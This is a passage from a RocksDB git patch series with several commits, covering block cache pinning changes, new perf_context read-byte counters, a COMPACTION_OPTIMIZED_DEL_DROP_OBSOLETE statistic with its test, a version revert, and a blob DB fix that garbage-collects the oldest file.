(rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0) { - index_entry = &rep->index_entry; - } + CachableEntry index_entry; unique_ptr iter( - new_table->NewIndexIterator(ReadOptions(), nullptr, index_entry)); + new_table->NewIndexIterator(ReadOptions(), nullptr, &index_entry)); + index_entry.value->CacheDependencies(pin); + if (pin) { + rep->index_entry = std::move(index_entry); + } else { + index_entry.Release(table_options.block_cache.get()); + } s = iter->status(); if (s.ok()) { @@ -764,8 +827,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // a level0 file, then save it in rep_->filter_entry; it will be // released in the destructor only, hence it will be pinned in the // cache while this reader is alive - if (rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0) { + if (pin) { rep->filter_entry = filter_entry; if (rep->filter_entry.value != nullptr) { rep->filter_entry.value->SetLevel(level); @@ -1305,8 +1367,8 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( if (rep->compression_dict_block) { compression_dict = rep->compression_dict_block->data; } - s = MaybeLoadDataBlockToCache(rep, ro, handle, compression_dict, &block, - is_index); + s = MaybeLoadDataBlockToCache(nullptr /*prefetch_buffer*/, rep, ro, handle, + compression_dict, &block, is_index); } // Didn't get any data from block caches. @@ -1355,8 +1417,9 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( } Status BlockBasedTable::MaybeLoadDataBlockToCache( - Rep* rep, const ReadOptions& ro, const BlockHandle& handle, - Slice compression_dict, CachableEntry* block_entry, bool is_index) { + FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro, + const BlockHandle& handle, Slice compression_dict, + CachableEntry* block_entry, bool is_index) { const bool no_io = (ro.read_tier == kBlockCacheTier); Cache* block_cache = rep->table_options.block_cache.get(); Cache* block_cache_compressed = @@ -1392,12 +1455,11 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( std::unique_ptr raw_block; { StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS); - s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer*/, - rep->footer, ro, handle, &raw_block, - rep->ioptions, block_cache_compressed == nullptr, - compression_dict, rep->persistent_cache_options, - rep->global_seqno, - rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile( + rep->file.get(), prefetch_buffer, rep->footer, ro, handle, + &raw_block, rep->ioptions, block_cache_compressed == nullptr, + compression_dict, rep->persistent_cache_options, rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); } if (s.ok()) { @@ -1420,14 +1482,14 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState( BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index, - Cleanable* block_cache_cleaner) + std::map>* block_map) : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr), table_(table), read_options_(read_options), icomparator_(icomparator), skip_filters_(skip_filters), is_index_(is_index), - block_cache_cleaner_(block_cache_cleaner) {} + block_map_(block_map) {} InternalIterator* BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( @@ -1436,23 +1498,15 @@ BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( BlockHandle handle; Slice input = index_value; Status s = handle.DecodeFrom(&input); - auto iter = NewDataBlockIterator(table_->rep_, read_options_, handle, nullptr, - is_index_, s); - if (block_cache_cleaner_) { - uint64_t offset = handle.offset(); - { - ReadLock rl(&cleaner_mu); - if (cleaner_set.find(offset) != cleaner_set.end()) { - // already have a reference to the block cache objects - return iter; - } - } - WriteLock wl(&cleaner_mu); - cleaner_set.insert(offset); - // Keep the data into cache until the cleaner cleansup - iter->DelegateCleanupsTo(block_cache_cleaner_); - } - return iter; + auto rep = table_->rep_; + if (block_map_) { + auto block = block_map_->find(handle.offset()); + assert(block != block_map_->end()); + return block->second.value->NewIterator(&rep->internal_comparator, nullptr, + true, rep->ioptions.statistics); + } + return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_, + s); } bool BlockBasedTable::BlockEntryIteratorState::PrefixMayMatch( diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 457edce2205..640a7065645 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -181,6 +181,8 @@ class BlockBasedTable : public TableReader { // that was allocated in block cache. virtual size_t ApproximateMemoryUsage() const = 0; + virtual void CacheDependencies(bool /* unused */) {} + protected: const InternalKeyComparator* icomparator_; @@ -227,7 +229,8 @@ class BlockBasedTable : public TableReader { // @param block_entry value is set to the uncompressed block if found. If // in uncompressed block cache, also sets cache_handle to reference that // block. - static Status MaybeLoadDataBlockToCache(Rep* rep, const ReadOptions& ro, + static Status MaybeLoadDataBlockToCache(FilePrefetchBuffer* prefetch_buffer, + Rep* rep, const ReadOptions& ro, const BlockHandle& handle, Slice compression_dict, CachableEntry* block_entry, @@ -345,11 +348,11 @@ class BlockBasedTable : public TableReader { // Maitaning state of a two-level iteration on a partitioned index structure class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { public: - BlockEntryIteratorState(BlockBasedTable* table, - const ReadOptions& read_options, - const InternalKeyComparator* icomparator, - bool skip_filters, bool is_index = false, - Cleanable* block_cache_cleaner = nullptr); + BlockEntryIteratorState( + BlockBasedTable* table, const ReadOptions& read_options, + const InternalKeyComparator* icomparator, bool skip_filters, + bool is_index = false, + std::map>* block_map = nullptr); InternalIterator* NewSecondaryIterator(const Slice& index_value) override; bool PrefixMayMatch(const Slice& internal_key) override; bool KeyReachedUpperBound(const Slice& internal_key) override; @@ -362,8 +365,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { bool skip_filters_; // true if the 2nd level iterator is on indexes instead of on user data. bool is_index_; - Cleanable* block_cache_cleaner_; - std::set cleaner_set; + std::map>* block_map_; port::RWMutex cleaner_mu; }; diff --git a/table/table_test.cc b/table/table_test.cc index c55eb425576..178cf4243d7 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -2174,7 +2174,7 @@ std::map MockCache::marked_data_in_cache_; // Block cache can contain raw data blocks as well as general objects. If an // object depends on the table to be live, it then must be destructed before the -// table is closed. This test makese sure that the only items remains in the +// table is closed. This test makes sure that the only items remains in the // cache after the table is closed are raw data blocks. TEST_F(BlockBasedTableTest, NoObjectInCacheAfterTableClose) { for (auto index_type : From ed0a4c93eff6406722142f07cd52b697d7042baa Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 18 Aug 2017 11:40:36 -0700 Subject: [PATCH 129/205] perf_context measure user bytes read Summary: With this PR, we can measure read-amp for queries where perf_context is enabled as follows: ``` SetPerfLevel(kEnableCount); Get(1, "foo"); double read_amp = static_cast(get_perf_context()->block_read_byte / get_perf_context()->get_read_bytes); SetPerfLevel(kDisable); ``` Our internal infra enables perf_context for a sampling of queries. So we'll be able to compute the read-amp for the sample set, which can give us a good estimate of read-amp. Closes https://github.com/facebook/rocksdb/pull/2749 Differential Revision: D5647240 Pulled By: ajkr fbshipit-source-id: ad73550b06990cf040cc4528fa885360f308ec12 --- db/db_basic_test.cc | 7 ++++++- db/db_impl.cc | 4 +++- db/db_iter.cc | 5 +++++ db/db_iterator_test.cc | 27 +++++++++++++++++++-------- include/rocksdb/perf_context.h | 5 +++++ monitoring/perf_context.cc | 6 ++++++ 6 files changed, 44 insertions(+), 10 deletions(-) diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc index cfbe2c5676a..a2604081b4d 100644 --- a/db/db_basic_test.cc +++ b/db/db_basic_test.cc @@ -360,7 +360,6 @@ TEST_F(DBBasicTest, FLUSH) { WriteOptions writeOpt = WriteOptions(); writeOpt.disableWAL = true; SetPerfLevel(kEnableTime); - ; ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1")); // this will now also flush the last 2 writes ASSERT_OK(Flush(1)); @@ -369,6 +368,7 @@ TEST_F(DBBasicTest, FLUSH) { get_perf_context()->Reset(); Get(1, "foo"); ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0); + ASSERT_EQ(2, (int)get_perf_context()->get_read_bytes); ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions()); ASSERT_EQ("v1", Get(1, "foo")); @@ -725,6 +725,7 @@ TEST_F(DBBasicTest, FlushOneColumnFamily) { TEST_F(DBBasicTest, MultiGetSimple) { do { CreateAndReopenWithCF({"pikachu"}, CurrentOptions()); + SetPerfLevel(kEnableCount); ASSERT_OK(Put(1, "k1", "v1")); ASSERT_OK(Put(1, "k2", "v2")); ASSERT_OK(Put(1, "k3", "v3")); @@ -738,12 +739,15 @@ TEST_F(DBBasicTest, MultiGetSimple) { std::vector values(20, "Temporary data to be overwritten"); std::vector cfs(keys.size(), handles_[1]); + get_perf_context()->Reset(); std::vector s = db_->MultiGet(ReadOptions(), cfs, keys, &values); ASSERT_EQ(values.size(), keys.size()); ASSERT_EQ(values[0], "v1"); ASSERT_EQ(values[1], "v2"); ASSERT_EQ(values[2], "v3"); ASSERT_EQ(values[4], "v5"); + // four kv pairs * two bytes per value + ASSERT_EQ(8, (int)get_perf_context()->multiget_read_bytes); ASSERT_OK(s[0]); ASSERT_OK(s[1]); @@ -751,6 +755,7 @@ TEST_F(DBBasicTest, MultiGetSimple) { ASSERT_TRUE(s[3].IsNotFound()); ASSERT_OK(s[4]); ASSERT_TRUE(s[5].IsNotFound()); + SetPerfLevel(kDisable); } while (ChangeCompactOptions()); } diff --git a/db/db_impl.cc b/db/db_impl.cc index cdba03915af..a197ca5c8b0 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -990,6 +990,7 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, size_t size = pinnable_val->size(); RecordTick(stats_, BYTES_READ, size); MeasureTime(stats_, BYTES_PER_READ, size); + PERF_COUNTER_ADD(get_read_bytes, size); } return s; } @@ -1117,6 +1118,7 @@ std::vector DBImpl::MultiGet( RecordTick(stats_, NUMBER_MULTIGET_KEYS_READ, num_keys); RecordTick(stats_, NUMBER_MULTIGET_BYTES_READ, bytes_read); MeasureTime(stats_, BYTES_PER_MULTIGET, bytes_read); + PERF_COUNTER_ADD(multiget_read_bytes, bytes_read); PERF_TIMER_STOP(get_post_process_time); return stat_list; @@ -2768,7 +2770,7 @@ Status DBImpl::VerifyChecksum() { const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd; std::string fname = TableFileName(immutable_db_options_.db_paths, fd.GetNumber(), fd.GetPathId()); - s = rocksdb::VerifySstFileChecksum(options, env_options, fname); + s = rocksdb::VerifySstFileChecksum(options, env_options, fname); } } if (!s.ok()) { diff --git a/db/db_iter.cc b/db/db_iter.cc index 801b1102f04..33f926ce07f 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -86,6 +86,7 @@ class DBIter: public Iterator { RecordTick(global_statistics, NUMBER_DB_PREV, prev_count_); RecordTick(global_statistics, NUMBER_DB_PREV_FOUND, prev_found_count_); RecordTick(global_statistics, ITER_BYTES_READ, bytes_read_); + PERF_COUNTER_ADD(iter_read_bytes, bytes_read_); ResetCounters(); } @@ -1014,6 +1015,7 @@ void DBIter::Seek(const Slice& target) { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1056,6 +1058,7 @@ void DBIter::SeekForPrev(const Slice& target) { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1094,6 +1097,7 @@ void DBIter::SeekToFirst() { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1141,6 +1145,7 @@ void DBIter::SeekToLast() { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } if (valid_ && prefix_extractor_ && prefix_same_as_start_) { diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index ea65f3a2603..d3bd164a2c0 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -1719,12 +1719,15 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { std::vector threads; std::function reader_func_next = [&]() { + SetPerfLevel(kEnableCount); + get_perf_context()->Reset(); Iterator* iter = db_->NewIterator(ReadOptions()); iter->SeekToFirst(); // Seek will bump ITER_BYTES_READ - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + uint64_t bytes = 0; + bytes += iter->key().size(); + bytes += iter->value().size(); while (true) { iter->Next(); total_next++; @@ -1733,20 +1736,25 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { break; } total_next_found++; - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + bytes += iter->key().size(); + bytes += iter->value().size(); } delete iter; + ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes); + SetPerfLevel(kDisable); + total_bytes += bytes; }; std::function reader_func_prev = [&]() { + SetPerfLevel(kEnableCount); Iterator* iter = db_->NewIterator(ReadOptions()); iter->SeekToLast(); // Seek will bump ITER_BYTES_READ - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + uint64_t bytes = 0; + bytes += iter->key().size(); + bytes += iter->value().size(); while (true) { iter->Prev(); total_prev++; @@ -1755,11 +1763,14 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { break; } total_prev_found++; - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + bytes += iter->key().size(); + bytes += iter->value().size(); } delete iter; + ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes); + SetPerfLevel(kDisable); + total_bytes += bytes; }; for (int i = 0; i < 10; i++) { diff --git a/include/rocksdb/perf_context.h b/include/rocksdb/perf_context.h index ff1a0caccbe..1095d063bd6 100644 --- a/include/rocksdb/perf_context.h +++ b/include/rocksdb/perf_context.h @@ -30,6 +30,11 @@ struct PerfContext { uint64_t block_read_time; // total nanos spent on block reads uint64_t block_checksum_time; // total nanos spent on block checksum uint64_t block_decompress_time; // total nanos spent on block decompression + + uint64_t get_read_bytes; // bytes for vals returned by Get + uint64_t multiget_read_bytes; // bytes for vals returned by MultiGet + uint64_t iter_read_bytes; // bytes for keys/vals decoded by iterator + // total number of internal keys skipped over during iteration. // There are several reasons for it: // 1. when calling Next(), the iterator is in the position of the previous diff --git a/monitoring/perf_context.cc b/monitoring/perf_context.cc index 55df0459bf4..791f4bdbe4e 100644 --- a/monitoring/perf_context.cc +++ b/monitoring/perf_context.cc @@ -40,6 +40,9 @@ void PerfContext::Reset() { block_read_time = 0; block_checksum_time = 0; block_decompress_time = 0; + get_read_bytes = 0; + multiget_read_bytes = 0; + iter_read_bytes = 0; internal_key_skipped_count = 0; internal_delete_skipped_count = 0; internal_recent_skipped_count = 0; @@ -117,6 +120,9 @@ std::string PerfContext::ToString(bool exclude_zero_counters) const { PERF_CONTEXT_OUTPUT(block_read_time); PERF_CONTEXT_OUTPUT(block_checksum_time); PERF_CONTEXT_OUTPUT(block_decompress_time); + PERF_CONTEXT_OUTPUT(get_read_bytes); + PERF_CONTEXT_OUTPUT(multiget_read_bytes); + PERF_CONTEXT_OUTPUT(iter_read_bytes); PERF_CONTEXT_OUTPUT(internal_key_skipped_count); PERF_CONTEXT_OUTPUT(internal_delete_skipped_count); PERF_CONTEXT_OUTPUT(internal_recent_skipped_count); From 5358a805681a901ab0a74330be4c0911dbbe78a9 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 18 Aug 2017 14:15:25 -0700 Subject: [PATCH 130/205] add VerifyChecksum to HISTORY.md Summary: it's a new feature that'll be released in 5.8, introduced by PR #2498. Closes https://github.com/facebook/rocksdb/pull/2759 Differential Revision: D5661923 Pulled By: ajkr fbshipit-source-id: 9ba9f0d146c453715358ef2dd298aa7765649d7c --- HISTORY.md | 1 + 1 file changed, 1 insertion(+) diff --git a/HISTORY.md b/HISTORY.md index a07337055ab..41dc077eb2c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -7,6 +7,7 @@ * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. * Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`. +* Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. From 0d8e992b47261ea0007499d03def9b3faf4ac3c1 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 18 Aug 2017 14:18:37 -0700 Subject: [PATCH 131/205] Revert the mistake in version update Summary: https://github.com/facebook/rocksdb/pull/2661 mistakenly updates the version. This patch reverts it. Closes https://github.com/facebook/rocksdb/pull/2760 Differential Revision: D5662089 Pulled By: maysamyabandeh fbshipit-source-id: f4735e37921c0ced6081a89080c78ac3728aa8bd --- HISTORY.md | 1 - include/rocksdb/version.h | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 41dc077eb2c..d4478c7d3de 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,7 +1,6 @@ # Rocksdb Change Log ## Unreleased -## 5.7.8 (08/14/2017) ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dd11ea7e8e5..fb920cf2e7e 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -5,7 +5,7 @@ #pragma once #define ROCKSDB_MAJOR 5 -#define ROCKSDB_MINOR 8 +#define ROCKSDB_MINOR 7 #define ROCKSDB_PATCH 0 // Do not use these. We made the mistake of declaring macros starting with From 8ace1f79b56f67e37afcc16ca3555b215fccc6ce Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Sat, 19 Aug 2017 14:01:25 -0700 Subject: [PATCH 132/205] add counter for deletion dropping optimization Summary: add this counter stat to track usage of deletion-dropping optimization. if usage is low, we can delete it to prevent bugs like #2726. Closes https://github.com/facebook/rocksdb/pull/2761 Differential Revision: D5665421 Pulled By: ajkr fbshipit-source-id: 881befa2d199838dac88709e7b376a43d304e3d4 --- db/compaction_iteration_stats.h | 2 ++ db/compaction_iterator.cc | 7 ++++++ db/compaction_job.cc | 4 ++++ db/db_compaction_test.cc | 40 +++++++++++++++++++++++++++++++++ include/rocksdb/statistics.h | 7 ++++-- 5 files changed, 58 insertions(+), 2 deletions(-) diff --git a/db/compaction_iteration_stats.h b/db/compaction_iteration_stats.h index 52a666e4e21..ddb534622a5 100644 --- a/db/compaction_iteration_stats.h +++ b/db/compaction_iteration_stats.h @@ -16,6 +16,8 @@ struct CompactionIterationStats { int64_t num_record_drop_obsolete = 0; int64_t num_record_drop_range_del = 0; int64_t num_range_del_drop_obsolete = 0; + // Deletions obsoleted before bottom level due to file gap optimization. + int64_t num_optimized_del_drop_obsolete = 0; uint64_t total_filter_time = 0; // Input statistics diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 08ae1973409..54726029227 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -111,6 +111,7 @@ void CompactionIterator::ResetRecordCounts() { iter_stats_.num_record_drop_obsolete = 0; iter_stats_.num_record_drop_range_del = 0; iter_stats_.num_range_del_drop_obsolete = 0; + iter_stats_.num_optimized_del_drop_obsolete = 0; } void CompactionIterator::SeekToFirst() { @@ -426,6 +427,9 @@ void CompactionIterator::NextFromInput() { // Can compact out this SingleDelete. ++iter_stats_.num_record_drop_obsolete; ++iter_stats_.num_single_del_fallthru; + if (!bottommost_level_) { + ++iter_stats_.num_optimized_del_drop_obsolete; + } } else { // Output SingleDelete valid_ = true; @@ -467,6 +471,9 @@ void CompactionIterator::NextFromInput() { // Note: Dropping this Delete will not affect TransactionDB // write-conflict checking since it is earlier than any snapshot. ++iter_stats_.num_record_drop_obsolete; + if (!bottommost_level_) { + ++iter_stats_.num_optimized_del_drop_obsolete; + } input_->Next(); } else if (ikey_.type == kTypeMerge) { if (!merge_helper_->HasOperator()) { diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 75f5ab6c85c..1d023ca4563 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -1014,6 +1014,10 @@ void CompactionJob::RecordDroppedKeys( RecordTick(stats_, COMPACTION_RANGE_DEL_DROP_OBSOLETE, c_iter_stats.num_range_del_drop_obsolete); } + if (c_iter_stats.num_optimized_del_drop_obsolete > 0) { + RecordTick(stats_, COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, + c_iter_stats.num_optimized_del_drop_obsolete); + } } Status CompactionJob::FinishCompactionOutputFile( diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index bca188a9832..ca77d5b939f 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -2684,6 +2684,46 @@ TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) { ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound()); } +TEST_F(DBCompactionTest, OptimizedDeletionObsoleting) { + // Deletions can be dropped when compacted to non-last level if they fall + // outside the lower-level files' key-ranges. + const int kNumL0Files = 4; + Options options = CurrentOptions(); + options.level0_file_num_compaction_trigger = kNumL0Files; + options.statistics = rocksdb::CreateDBStatistics(); + DestroyAndReopen(options); + + // put key 1 and 3 in separate L1, L2 files. + // So key 0, 2, and 4+ fall outside these levels' key-ranges. + for (int level = 2; level >= 1; --level) { + for (int i = 0; i < 2; ++i) { + Put(Key(2 * i + 1), "val"); + Flush(); + } + MoveFilesToLevel(level); + ASSERT_EQ(2, NumTableFilesAtLevel(level)); + } + + // Delete keys in range [1, 4]. These L0 files will be compacted with L1: + // - Tombstones for keys 2 and 4 can be dropped early. + // - Tombstones for keys 1 and 3 must be kept due to L2 files' key-ranges. + for (int i = 0; i < kNumL0Files; ++i) { + Put(Key(0), "val"); // sentinel to prevent trivial move + Delete(Key(i + 1)); + Flush(); + } + dbfull()->TEST_WaitForCompact(); + + for (int i = 0; i < kNumL0Files; ++i) { + std::string value; + ASSERT_TRUE(db_->Get(ReadOptions(), Key(i + 1), &value).IsNotFound()); + } + ASSERT_EQ(2, options.statistics->getTickerCount( + COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE)); + ASSERT_EQ(2, + options.statistics->getTickerCount(COMPACTION_KEY_DROP_OBSOLETE)); +} + INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam, ::testing::Values(std::make_tuple(1, true), std::make_tuple(1, false), diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index b4629358e66..731ff780963 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -105,8 +105,9 @@ enum Tickers : uint32_t { COMPACTION_KEY_DROP_OBSOLETE, // The key is obsolete. COMPACTION_KEY_DROP_RANGE_DEL, // key was covered by a range tombstone. COMPACTION_KEY_DROP_USER, // user compaction function has dropped the key. - COMPACTION_RANGE_DEL_DROP_OBSOLETE, // all keys in range were deleted. + // Deletions obsoleted before bottom level due to file gap optimization. + COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, // Number of keys written to the database via the Put and Write call's NUMBER_KEYS_WRITTEN, @@ -264,7 +265,9 @@ const std::vector> TickersNameMap = { {COMPACTION_KEY_DROP_RANGE_DEL, "rocksdb.compaction.key.drop.range_del"}, {COMPACTION_KEY_DROP_USER, "rocksdb.compaction.key.drop.user"}, {COMPACTION_RANGE_DEL_DROP_OBSOLETE, - "rocksdb.compaction.range_del.drop.obsolete"}, + "rocksdb.compaction.range_del.drop.obsolete"}, + {COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, + "rocksdb.compaction.optimized.del.drop.obsolete"}, {NUMBER_KEYS_WRITTEN, "rocksdb.number.keys.written"}, {NUMBER_KEYS_READ, "rocksdb.number.keys.read"}, {NUMBER_KEYS_UPDATED, "rocksdb.number.keys.updated"}, From 4624ae52c91d8f4ecdb94451a544c844c06db777 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Sun, 20 Aug 2017 16:56:01 -0700 Subject: [PATCH 133/205] GC the oldest file when out of space Summary: When out of space, blob db should GC the oldest file. The current implementation GC the newest one instead. Fixing it. Closes https://github.com/facebook/rocksdb/pull/2757 Differential Revision: D5657611 Pulled By: yiwu-arbug fbshipit-source-id: 56c30a4c52e6ab04551dda8c5c46006d4070b28d --- utilities/blob_db/blob_db_impl.cc | 60 +++++++++++++++++++------------ utilities/blob_db/blob_db_impl.h | 15 ++++---- utilities/blob_db/blob_db_test.cc | 35 ++++++++++++++++++ 3 files changed, 81 insertions(+), 29 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index bbae53c0ebb..6939e73aaff 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1560,7 +1560,9 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { } } - for (auto bfile : process_files) CloseSeqWrite(bfile, false); + for (auto bfile : process_files) { + CloseSeqWrite(bfile, false); + } return std::make_pair(true, -1); } @@ -1909,7 +1911,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, - uint64_t last_id, std::string* reason) { + bool is_oldest_simple_blob_file, + std::string* reason) { if (bfile->HasTTL()) { ttlrange_t ttl_range = bfile->GetTTLRange(); if (now > ttl_range.second) { @@ -1966,13 +1969,12 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } - bool ret = bfile->BlobFileNumber() == last_id; - if (ret) { - *reason = "eligible last simple blob file"; - } else { - *reason = "not eligible since not last simple blob file"; + if (is_oldest_simple_blob_file) { + *reason = "out of space and is the oldest simple blob file"; + return true; } - return ret; + *reason = "out of space but is not the oldest simple blob file"; + return false; } std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { @@ -2096,31 +2098,27 @@ std::pair BlobDBImpl::CallbackEvicts( } void BlobDBImpl::CopyBlobFiles( - std::vector>* bfiles_copy, uint64_t* last_id) { + std::vector>* bfiles_copy) { ReadLock rl(&mutex_); // take a copy bfiles_copy->reserve(blob_files_.size()); - for (auto const& ent : blob_files_) { - bfiles_copy->push_back(ent.second); - - // A. has ttl is immutable, once set, hence no locks required - // B. blob files are sorted based on number(i.e. index of creation ) - // so we will return the last blob file - if (!ent.second->HasTTL()) *last_id = ent.second->BlobFileNumber(); + for (auto const& p : blob_files_) { + bfiles_copy->push_back(p.second); } } void BlobDBImpl::FilterSubsetOfFiles( const std::vector>& blob_files, std::vector>* to_process, uint64_t epoch, - uint64_t last_id, size_t files_to_collect) { + size_t files_to_collect) { // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( std::ceil(100 / static_cast(kGCFilePercentage))); uint64_t now = EpochNow(); size_t files_processed = 0; + bool simple_blob_file_found = false; for (auto bfile : blob_files) { if (files_processed >= files_to_collect) break; // if this is the first time processing the file @@ -2140,8 +2138,15 @@ void BlobDBImpl::FilterSubsetOfFiles( // then it should not be GC'd if (bfile->Obsolete() || !bfile->Immutable()) continue; + bool is_oldest_simple_blob_file = false; + if (!simple_blob_file_found && !bfile->HasTTL()) { + is_oldest_simple_blob_file = true; + simple_blob_file_found = true; + } + std::string reason; - bool shouldgc = ShouldGCFile(bfile, now, last_id, &reason); + bool shouldgc = + ShouldGCFile(bfile, now, is_oldest_simple_blob_file, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 @@ -2165,11 +2170,8 @@ std::pair BlobDBImpl::RunGC(bool aborted) { current_epoch_++; - // collect the ID of the last regular file, in case we need to GC it. - uint64_t last_id = std::numeric_limits::max(); - std::vector> blob_files; - CopyBlobFiles(&blob_files, &last_id); + CopyBlobFiles(&blob_files); if (!blob_files.size()) return std::make_pair(true, -1); @@ -2178,7 +2180,7 @@ std::pair BlobDBImpl::RunGC(bool aborted) { size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100; std::vector> to_process; - FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, last_id, + FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, files_to_collect); // in this collect the set of files, which became obsolete @@ -2288,6 +2290,16 @@ std::vector> BlobDBImpl::TEST_GetBlobFiles() const { return blob_files; } +std::vector> BlobDBImpl::TEST_GetObsoleteFiles() + const { + ReadLock l(&mutex_); + std::vector> obsolete_files; + for (auto& bfile : obsolete_files_) { + obsolete_files.emplace_back(bfile); + } + return obsolete_files; +} + void 